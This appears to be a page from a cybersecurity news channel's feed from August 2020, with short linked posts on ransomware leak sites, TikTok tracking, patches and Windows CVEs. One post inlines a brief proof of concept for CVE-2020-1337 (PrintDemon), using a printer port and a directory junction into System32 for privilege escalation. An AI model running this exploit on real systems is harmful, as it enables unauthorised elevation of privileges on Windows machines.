■■■■□ Malware is an important part of an engagement, though as many security solutions are now evolving past rudimentary signature comparisons to using more advanced techniques to detect malicious activity, it is important that we as attackers understand the methods they are using and how we can avoid them. https://blog.dylan.codes/defending-your-malware https://t.me/cKure/5216
All posts in Uncategorized
August 12, 2020 at 12:49AM
■■■■■ TikTok Tracked User Data Using Tactic Banned by Google. It tracked MAC addresses of users just as Google does itself; however in an obfuscate manner. Well, the funny part is the article undermentioned describes MAC address as a 12 digit number . https://www.wsj.com/articles/tiktok-tracked-user-data-using-tactic-banned-by-google-11597176738 https://t.me/cKure/5215
August 12, 2020 at 12:41AM
■■■■■ CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon) with a TOCTOU. PoC:mkdir C:\testAdd-PrinterPort -Name c:\test\ualapi.dllNew-Item -Type Junction -Path C:\test -Value C:\Windows\System32 https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/ https://t.me/cKure/5214
August 11, 2020 at 06:42PM
■■■■■ Adobe fixes critical code execution bugs in Acrobat and Reader. https://www.bleepingcomputer.com/news/security/adobe-fixes-critical-code-execution-bugs-in-acrobat-and-reader/ https://t.me/cKure/5213
August 11, 2020 at 03:27PM
■■■■□ HIBP / HaveIBeenPwned Set to Go Open Source https://www.infosecurity-magazine.com:443/news/haveibeenpwned-set-open/ https://t.me/cKure/5212
August 11, 2020 at 03:05PM
■■□□□ Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where publish data of victims who refuse to pay a ransom demand. https://securityaffairs.co/wordpress/106989/malware/avaddon-ransomware-leak-site.html | #DataLeak #Avaddon https://t.me/cKure/5211
August 11, 2020 at 12:43PM
● Twitter handle of cKure was down for a few days due to verification issues. Details: https://www.bleepingcomputer.com/news/technology/twitter-experiencing-issues-sending-account-verification-codes/ https://t.me/cKure/5209
August 11, 2020 at 11:26AM
■■■□□ #China now blocking ESNI-enabled TLS 1.3 connections, say Great-Firewall-watchers. https://go.theregister.com/feed/www.theregister.com/2020/08/11/china_blocking_tls_1_3_esni/ #GreatFirewallo#China now blocking ESNI-enabled TLS 1.3 connections, say Great-Firewall-watchers. https://go.theregister.com/feed/www.theregister.com/2020/08/11/china_blocking_tls_1_3_esni/ #GreatFirewallofChina https://t.me/cKure/5208
August 11, 2020 at 11:18AM
■□□□□ Bug Bounty tip. https://mobile.twitter.com/BurpBounty/status/1293083697474867200 https://t.me/cKure/5205
August 11, 2020 at 11:12AM
■■■□□ CVE-2020-11518: how I bruteforced my way into your Active Directory. https://honoki.net/2020/08/10/cve-2020-11518-how-i-bruteforced-my-way-into-your-active-directory/ https://t.me/cKure/5204